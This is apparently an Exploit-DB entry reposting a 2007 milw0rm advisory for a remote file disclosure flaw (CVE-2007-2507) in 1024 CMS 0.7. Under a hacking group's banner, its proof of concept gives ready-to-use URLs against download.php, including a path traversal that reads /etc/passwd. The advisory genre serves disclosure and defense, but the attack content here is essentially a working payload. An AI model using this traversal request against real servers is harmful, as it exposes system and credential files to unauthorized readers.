1024 CMS 0.7 - 'download.php' Remote File Disclosure
Author: Dj7xpl
type: webapps
platform: php
port:
date_added: 2007-05-01
date_updated: 2016-11-21
verified: 1
codes: OSVDB-35542;CVE-2007-2507
tags:
aliases:
screenshot_url:
application_url:
\#'#/
(-.-)
--------------------oOO---(_)---OOo-------------------
| [ Y! Underground Group ] |
| [ www.dj7xpl.2600.ir ] |
| [ Dj7xpl @ 2600.ir ] |
------------------------------------------------------
<--------------------------------------------------------------------------------------------------------------------->
[!] Portal : 1024 CMS Version 0.7
[!] Vendor : http://www.treble.lfhost.com
[!] Author : Dj7xpl
[!] Type : Remote File Disclosure Vuln
[!] We Are : Y4Ho0 -Mr.Mithridates -Sir SiSiLi -System Failure -Satanic Soulfull -And Me
<--------------------------------------------------------------------------------------------------------------------->
<--------------------------------------------------------------------------------------------------------------------->
PoC :
http://[Target]/[Path]/includes/download.php?item=../uploads/[File]
http://Target.com/1024/includes/download.php?item=../uploads/../../../../../etc/passwd
<--------------------------------------------------------------------------------------------------------------------->
# milw0rm.com [2007-05-02]